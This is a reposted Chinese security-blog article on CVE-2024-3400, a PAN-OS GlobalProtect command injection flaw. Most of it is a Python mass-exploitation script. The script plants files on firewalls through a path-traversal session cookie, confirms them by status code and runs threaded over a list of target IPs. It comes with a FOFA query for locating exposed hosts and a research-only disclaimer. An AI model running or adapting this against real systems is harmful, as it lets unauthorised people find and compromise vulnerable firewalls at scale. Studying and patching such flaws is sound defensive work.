CVE-2024-3400

admin
admin
admin
140350
文章
117
评论
2024年4月19日02:36:09评论105 views字数 2016阅读6分43秒阅读模式

漏洞描述

Palo Alto Networks PAN-OS 软件的 GlobalProtect功能中存在命令注入漏洞,该漏洞影响启用了 GlobalProtect 网关和设备遥测配置的 PAN-OS 10.2、PAN-OS 11.0 和 PAN-OS 11.1 防火墙,未经身份验证的威胁者可利用该漏洞在防火墙上以root权限执行任意代码。

资产测绘

FOFA:app="paloalto-GlobalProtect"

漏洞复现

import random
import string
from concurrent.futures import ThreadPoolExecutor
import urllib3
import requests

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
resFile = open("resFile.txt", "w")

def GenerateRandomString(length):
    characters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(characters) for _ in range(length))

def CheckFile(url, proxy, filename):
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp1 = requests.get(url=url + f"/global-protect/portal/images/{filename}.txt", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    resp2 = requests.get(url=url + f"/global-protect/portal/images/{filename}_cve_test.txt", headers=headers, proxies=proxy,
                         verify=False, allow_redirects=False, timeout=10)
    if resp1.status_code == 403 and resp2.status_code == 404:
        return True
    else:
        return False

def CreateFile(url, proxy):
    filename = GenerateRandomString(10)
    headers = {
        "Cookie": f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{filename}.txt;",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp = requests.post(url=url + "/ssl-vpn/hipreport.esp", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    if resp.status_code == 200:
        if CheckFile(url, proxy, filename):
            print(f"[+] {url}")
            resFile.write(f"{url}\n")


def GetUrls():
    with open("ip_all.txt","r") as f:
        for address in f.readlines():
            address = address.strip()
            yield address

if __name__ == "__main__":
    # proxy = {
    #     "http": "http://127.0.0.1:8080",
    #     "https": "http://127.0.0.1:8080"
    # }
    proxy = {}
    addrs = GetUrls()
    max_thread_num = 30
    executor = ThreadPoolExecutor(max_workers=max_thread_num)
    for addr in addrs:
        future = executor.submit(CreateFile, addr, proxy)



原文始发于微信公众号(漏洞文库):【漏洞复现】CVE-2024-3400




							

						
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
	
				
				

	
    
		
  • 
			左青龙
		
    • 
		
  • 微信扫一扫
    • 
		
  • 
			weinxin
		
    • 
	

	
    
		
  • 
			右白虎
		
    • 
		
  • 微信扫一扫
    • 
		
  • 
			weinxin
		
    • 
	

	



	
	

		

				

	


	




								

			
		

	
									

					admin				
    
											
  • 本文由  发表于 2024年4月19日02:36:09
    • 
						
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  
CVE-2024-3400http://cn-sec.com/archives/2669683.html

                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

    • 
			

	



				
				

				
										

				
				

	

			

	




				
				

			



	


				




	
	
			

		

							

											

														

																	
发表评论

																匿名网友
								填写信息